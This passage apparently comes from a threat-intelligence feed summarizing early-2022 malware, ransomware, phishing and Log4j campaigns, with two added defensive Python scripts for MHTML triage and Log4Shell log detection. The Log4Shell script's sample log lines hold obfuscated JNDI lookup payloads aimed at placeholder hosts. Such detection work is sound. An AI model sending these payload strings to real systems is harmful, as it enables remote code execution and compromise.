Researchers at INKY have detected a phishing campaign impersonating the United States Department of Labor (DoL). Most of the phishing emails had sender addresses spoofed to look as if they came from no-reply@dol[.]gov, the real DoL domain; a small subset was spoofed to appear to come from no-reply@dol[.]com, which is not the DoL domain.
Source: https://www.inky.com/blog/fresh-phish-phishers-lure-victims-with-fake-invites-to-bid-on-nonexistent-federal-projects
Intel Source:
Akamai
Intel Name:
Mirai Botnet Abusing Log4j
Date of Scan:
2022-01-21
Impact:
HIGH
Summary:
Researchers at Akamai examined an ARM binary that revealed the adaptation of the Log4j vulnerability to infect devices and assist in the proliferation of malware used by the Mirai botnet.
Source: https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability
Intel Source:
Kaspersky
Intel Name:
MoonBounce
Date of Scan:
2022-01-20
Impact:
HIGH
Summary:
Kaspersky researchers identified a UEFI firmware-level compromise. Further analysis showed that a single component within the inspected firmware image was modified by the attackers in a way that allowed them to intercept the original execution flow of the machine's boot sequence and introduce a sophisticated infection chain.
Source: https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
Intel Source:
Microsoft
Intel Name:
WhisperGate
Date of Scan:
2022-01-20
Impact:
HIGH
Summary:
MSTIC found a destructive malware operation targeting organizations in Ukraine. The malware has been dubbed WhisperGate. The activity has been identified as possible Master Boot Record (MBR) wiper activity.
Source: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ https://twitter.com/threatintel/status/1483470646210445320
Intel Source:
Elastic
Intel Name:
Operation Bleeding Bear
Date of Scan:
2022-01-20
Impact:
HIGH
Summary:
Researchers at Elastic Security provide new analysis and insights into a targeted campaign against Ukrainian organizations with destructive malware. In a multi-staged attack, one malware component known as WhisperGate wipes the Master Boot Record (MBR), leaving any impacted machine inoperable after reboot.
Source: https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/#indicators
Intel Source:
Trend Micro
Intel Name:
White Rabbit Ransomware
Date of Scan:
2022-01-20
Impact:
MEDIUM
Summary:
The Trend Micro research team spotted the new ransomware family "White Rabbit", which is discreetly making a name for itself following an attack on a local US bank in December 2021. The ransomware copies its hiding capability from Egregor and carries a potential connection to the APT group FIN8.
Source: https://lodestone.com/insight/white-rabbit-ransomware-and-the-f5-backdoor/ https://www.trendmicro.com/en_us/research/22/a/new-ransomware-spotted-white-rabbit-and-its-evasion-tactics.html
Intel Source:
SentinelOne
Intel Name:
Blackcat Ransomware
Date of Scan:
2022-01-20
Impact:
MEDIUM
Summary:
Researchers at SentinelOne analysed BlackCat ransomware behaviour. BlackCat first appeared in late November 2021 and has reportedly been attacking targets in multiple countries, including Australia, India and the U.S., demanding ransoms in the region of $400,000 to $3,000,000 in Bitcoin or Monero.
Source: https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/
Intel Source:
Kaspersky
Intel Name:
Targeted ICS Spyware
Date of Scan:
2022-01-20
Impact:
MEDIUM
Summary:
Kaspersky ICS Experts have noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.
Source: https://ics-cert.kaspersky.com/publications/reports/2022/1/19/campaigns-abusing-corporate-trusted-infrastructure-hunt-for-corporate-credentials-on-ics-networks/
Intel Source:
STR
Intel Name:
SysJoker_Seeder Queries - 12/01/2022
Date of Scan:
2022-01-19
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
Bushidotoken
Intel Name:
(Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
Date of Scan:
2022-01-19
Impact:
MEDIUM
Summary:
A security researcher discovered a large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organizations. The attacker uses a custom "Mail Box" toolkit, an unsophisticated phishing package deployed on the actor's infrastructure as well as on legitimate websites compromised to host phishing pages.
Source: https://blog.bushidotoken.net/2022/01/tracking-renewable-energy-intelligence.html https://www.bleepingcomputer.com/news/security/cyber-espionage-campaign-targets-renewable-energy-companies/
Intel Source:
STR
Intel Name:
AIKIDO C2_Seeder Queries - 18/01/2022
Date of Scan:
2022-01-19
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
STR
Intel Name:
AIKIDO ICEID New Delivery Method_Seeder Queries - 12/01/2022
Date of Scan:
2022-01-19
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
Uptycs
Intel Name:
vSphere cryptominer campaign
Date of Scan:
2022-01-19
Impact:
MEDIUM
Summary:
Researchers from Uptycs identified malicious shell scripts that specifically target VMware vSphere. The attackers use commands in the shell script to modify the vSphere service so that it runs the XMRig miner.
Source: https://www.uptycs.com/blog/cryptominer-campaign-targeting-vmware-vsphere-services-for-coin-mining
Intel Source:
STR
Intel Name:
MuddyWater_MOIS_Seeder Queries - 14/01/2022
Date of Scan:
2022-01-18
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
Kaspersky
Intel Name:
BlueNoroff APT Group
Date of Scan:
2022-01-14
Impact:
HIGH
Summary:
The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The latest attacks targeted cryptocurrency startups in the US, Russia, China, India, the UK, Ukraine, Poland, the Czech Republic, the UAE, Singapore, Estonia, Vietnam, Malta, Germany and Hong Kong.
Source: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/
Intel Source:
US cyber command
Intel Name:
MuddyWater_MOIS
Date of Scan:
2022-01-13
Impact:
HIGH
Summary:
U.S. Cyber Command's Cyber National Mission Force (CNMF) has identified multiple open-source tools used by the Iranian advanced persistent threat (APT) group known as MuddyWater. The techniques used by the group include side-loading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command-and-control functions.
Source: https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/
Intel Source:
Microsoft
Intel Name:
DEV-0401
Date of Scan:
2022-01-13
Impact:
MEDIUM
Summary:
The Microsoft Threat Intelligence Center has detected attackers exploiting the CVE-2021-44228 (Log4Shell) vulnerability in internet-facing systems running VMware Horizon. These attacks are performed by a China-based ransomware operator that Microsoft tracks as DEV-0401, which deploys the NightSky ransomware.
Source: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#NightSky
Intel Source:
CrowdStrike
Intel Name:
TellYouThePass Ransomware
Date of Scan:
2022-01-13
Impact:
HIGH
Summary:
CrowdStrike found a re-emerged version of the TellYouThePass ransomware compiled in Golang. The same ransomware was recently associated with Log4Shell post-exploitation targeting Windows and Linux.
Source: https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/
Intel Source:
Avast
Intel Name:
Exploit Kits vs Chrome
Date of Scan:
2022-01-13
Impact:
MEDIUM
Summary:
Avast researchers found that the Underminer exploit kit had developed an exploit for a Chromium-based vulnerability. Two exploit kits dared to attack Google Chrome: Magnitude, using CVE-2021-21224 and CVE-2021-31956, and Underminer, using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020 and CVE-2020-1054.
Source: https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/
Intel Source:
eSentire
Intel Name:
GootLoader Campaign
Date of Scan:
2022-01-13
Impact:
MEDIUM
Summary:
eSentire researchers found that the operators of the GootLoader campaign are targeting employees of accounting and law firms. GootLoader is a stealthy initial-access malware that, after gaining a foothold on the victim's computer, infects the system with ransomware or other malware.
Source: https://www.esentire.com/security-advisories/gootloader-hackers-are-compromising-employees-of-law-firms-and-accounting-agencies-warns-esentire
Intel Source:
ASEC
Intel Name:
Magniber Ransomware
Date of Scan:
2022-01-13
Impact:
MEDIUM
Summary:
Analysts from AhnLab discovered that the attackers behind the Magniber ransomware, who have so far been exploiting Internet Explorer vulnerabilities, are now targeting PCs through modern browsers such as Edge and Chrome.
Source: https://asec.ahnlab.com/en/30645/
Intel Source:
Netskope
Intel Name:
Abusing MS Office Using Malicious Web Archive Files
Date of Scan:
2022-01-13
Impact:
MEDIUM
Summary:
The state-sponsored OceanLotus group is now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.
Source: https://www.netskope.com/blog/abusing-microsoft-office-using-malicious-web-archive-files
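Both OceanLotus entries on this page (the QI-ANXIN report above and this Netskope one) describe backdoors delivered inside web archive (.MHT/.MHTML) files, which are MIME multipart/related documents that Office will open and that can carry arbitrary embedded parts. As an added example, not code from either report or from this feed, the Python below parses an archive with the standard library's email parser, enumerates every part with its declared type, Content-Location, decoded size and hash, and flags parts that are active content by declared type, by file extension or by magic bytes, which is the triage a responder wants before the document is opened anywhere. The archive it parses is constructed for the demo; the embedded part is a few invented bytes that begin with the ZIP magic, not a real document.

```python
import email
import hashlib
from email import policy
from urllib.parse import urlsplit

# Constructed web archive for this demo (not a sample from the reports above): an HTML part
# plus an embedded macro-enabled Word document whose body is a few invented base64 bytes
# that merely begin with the ZIP/OOXML magic "PK\x03\x04".
SAMPLE_MHT = b"""MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MultipartBoundary--demo----"

------MultipartBoundary--demo----
Content-Type: text/html
Content-Location: file:///C:/Users/user/Desktop/invoice.mht

<html><body>Please open the attached invoice.</body></html>
------MultipartBoundary--demo----
Content-Type: application/vnd.ms-word.document.macroEnabled.12
Content-Transfer-Encoding: base64
Content-Location: file:///C:/Users/user/Desktop/invoice.docm

UEsDBBQABgAIAAAAIQA=
------MultipartBoundary--demo------
"""

# Content types and extensions that have no business inside a "saved web page".
ACTIVE_CONTENT_TYPES = {
    "application/vnd.ms-word.document.macroenabled.12",
    "application/vnd.ms-excel.sheet.macroenabled.12",
    "application/vnd.ms-powerpoint.presentation.macroenabled.12",
    "application/x-msdownload",
    "application/x-msdos-program",
    "application/hta",
}
ACTIVE_EXTENSIONS = (".docm", ".xlsm", ".pptm", ".exe", ".dll", ".scr", ".hta", ".js", ".vbs", ".ps1", ".lnk")
MAGIC = [(b"MZ", "pe"), (b"PK\x03\x04", "zip/ooxml"), (b"\xd0\xcf\x11\xe0", "ole2"), (b"ActiveMime", "activemime")]
SUSPICIOUS_MAGIC = {"pe", "ole2", "activemime"}


def sniff(data):
    """Identify a part's real container format from its leading bytes, ignoring the declared type."""
    for prefix, name in MAGIC:
        if data.startswith(prefix):
            return name
    return "unknown"


def inspect_mht(raw):
    """Parse an MHTML archive and describe every leaf part, flagging active content.
    Returns a list of dicts with keys type, location, size, sha256, magic, suspicious."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        data = part.get_payload(decode=True) or b""   # undoes base64 / quoted-printable
        ctype = part.get_content_type().lower()
        location = str(part.get("Content-Location", ""))
        path = urlsplit(location).path.lower()
        magic = sniff(data)
        suspicious = (
            ctype in ACTIVE_CONTENT_TYPES
            or path.endswith(ACTIVE_EXTENSIONS)
            or magic in SUSPICIOUS_MAGIC
        )
        parts.append({
            "type": ctype,
            "location": location,
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "magic": magic,
            "suspicious": suspicious,
        })
    return parts


def suspicious_locations(raw):
    """Content-Location values of the parts worth extracting for static analysis."""
    return [p["location"] for p in inspect_mht(raw) if p["suspicious"]]


if __name__ == "__main__":
    for p in inspect_mht(SAMPLE_MHT):
        flag = "SUSPICIOUS" if p["suspicious"] else "ok"
        print(f"{flag:10} {p['type']:50} {p['magic']:10} {p['size']:>6}  {p['location']}")
```

The declared Content-Type and Content-Location are attacker-controlled, so the magic check is the one that matters: an OLE2 or ActiveMime body inside a "web page", or a PE inside a part labelled as an image, is the signal whatever the headers claim. For a real sample, pass the file's bytes to inspect_mht and write out the flagged parts' decoded payloads for analysis rather than opening the archive in Word.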
Intel Source:
Fortinet
Intel Name:
RedLine Stealer
Date of Scan:
2022-01-12
Impact:
MEDIUM
Summary:
Researchers at Fortinet identified an executable file, "Omicron Stats.exe", attributed to a variant of the RedLine Stealer malware. The researchers analysed the new RedLine variant, its core functions, how it communicates with its C2 server and how organizations can protect themselves.
Source: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer
Intel Source:
STR
Intel Name:
STR Omega 1/12/22
Date of Scan:
2022-01-12
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
Cisco Talos
Intel Name:
Nanocore Netwire and AsyncRAT
Date of Scan:
2022-01-12
Impact:
HIGH
Summary:
Cisco Talos researchers discovered a new campaign using public cloud infrastructure to spread the Nanocore, Netwire and AsyncRAT remote access trojans.
Source: https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html
Intel Source:
MalwareBytes
Intel Name:
Patchwork APT
Date of Scan:
2022-01-12
Impact:
LOW
Summary:
Malwarebytes Labs has analysed a campaign in which the Patchwork APT used malicious RTF files to drop a variant of the BADNEWS Remote Administration Trojan (RAT).
Source: https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/
Intel Source:
Cado security
Intel Name:
ABCbot
Date of Scan:
2022-01-12
Impact:
LOW
Summary:
Cado Security researchers analysed Abcbot and found a link to the Xanthe cryptojacking campaign. The same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks.
Source: https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/
Intel Source:
Checkpoint
Intel Name:
APT35
Date of Scan:
2022-01-11
Impact:
HIGH
Summary:
Check Point researchers discovered that APT35 has started widespread scanning and attempts to exploit the Log4j flaw in publicly facing systems, using it to distribute a new modular PowerShell toolkit.
Source: https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/
Intel Source:
Intezer
Intel Name:
SysJoker Backdoor
Date of Scan:
2022-01-11
Impact:
HIGH
Summary:
Researchers from Intezer discovered a new multi-platform backdoor that targets Windows, macOS and Linux, which they named SysJoker. SysJoker masquerades as a system update and generates its C2 address by decoding a string retrieved from a text file hosted on Google Drive.
Source: https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/
Intel Source:
STR
Intel Name:
Trojanized dnspy app campaign
Date of Scan:
2022-01-11
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
STR
Intel Name:
VMware Horizon Exploitation Using Log4J
Date of Scan:
2022-01-11
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
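Several entries on this page (Prophet Spider, Mirai, DEV-0401, APT35 and the STR VMware Horizon queries) concern exploitation of the Log4j lookup vulnerability CVE-2021-44228 in internet-facing services. As an added example that is not code from any of those reports or from this feed, the Python below shows the normalization a detection needs before it can match: attackers hide the ${jndi:...} lookup behind percent-encoding and nested ${lower:}, ${upper:}, ${::-x} and ${env:X:-y} wrappers, each of which Log4j resolves before the JNDI lookup runs, so a rule that only looks for the literal string "jndi:" misses most real traffic. The access-log lines are constructed for the demo; the hosts and paths in them are invented.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines for this demo (invented hosts and paths).
# Lines 2-5 carry the well-known Log4Shell payload spellings: plain ${jndi:...},
# nested ${lower:}/${upper:} wrappers, ${::-x} and ${env:X:-y} default-value tricks,
# and a percent-encoded lookup in the query string.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [11/Jan/2022:10:01:09 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${::-l}${::-d}ap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [11/Jan/2022:10:01:11 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.4%3A1099%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [11/Jan/2022:10:01:13 +0000] "GET /x HTTP/1.1" 200 5 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.4/d}"',
]

INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Case-insensitive because Log4j lowercases the lookup prefix before dispatching it.
JNDI = re.compile(r"jndi:([a-z]+)://([^/\s}\"']+)", re.IGNORECASE)


def _resolve(match):
    """Collapse one innermost ${...} the way Log4j's interpolator would, but only for the
    obfuscation primitives; a real lookup such as ${jndi:...} is returned untouched."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:              # ${lookup:-default}: an empty or unknown lookup yields the default
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=20):
    """Percent-decode (twice, to cover double encoding) and peel nested lookups inside-out
    until the string stops changing. max_rounds bounds pathological inputs."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        peeled = INNERMOST.sub(_resolve, text)
        if peeled == text:
            break
        text = peeled
    return text


def find_jndi(line):
    """Return (scheme, target) of the first JNDI lookup in a log line after normalization, else None."""
    m = JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return [(line_number, scheme, target), ...] for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = find_jndi(line)
        if hit is not None:
            hits.append((number, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for number, scheme, target in scan(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup via {scheme} to {target}")
```

Feed real access, proxy or WAF log lines to find_jndi; what comes back is the scheme and the host the victim JVM would have contacted, which is the indicator worth pivoting on for callbacks in firewall and DNS logs. The normalization covers the common primitives only; a lookup assembled from ${date:...} patterns or other lookups would need those resolvers added, so treat a miss as "not matched", not "clean".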
Intel Source:
Palo Alto
Intel Name:
TA551 IcedID
Date of Scan:
2022-01-06
Impact:
MEDIUM
Summary:
Palo Alto Unit 42 researchers tracked TA551 activity in which the threat actor used Word documents with both German and Italian templates, later delivering the IcedID malware, followed by Cobalt Strike.
Source: https://github.com/pan-unit42/tweets/blob/master/2022-01-05-IOCs-for-TA551-IcedID-with-Cobalt-Strike.txt
Intel Source:
Palo Alto
Intel Name:
Web Skimmer Campaign
Date of Scan:
2022-01-06
Impact:
MEDIUM
Summary:
Researchers at Unit 42 have found a supply-chain attack leveraging a cloud video platform to distribute skimmer (aka formjacking) campaigns. In skimmer attacks, cybercriminals inject malicious JavaScript code into a website and take over the functionality of the site's HTML form pages to collect sensitive user information.
Source: https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/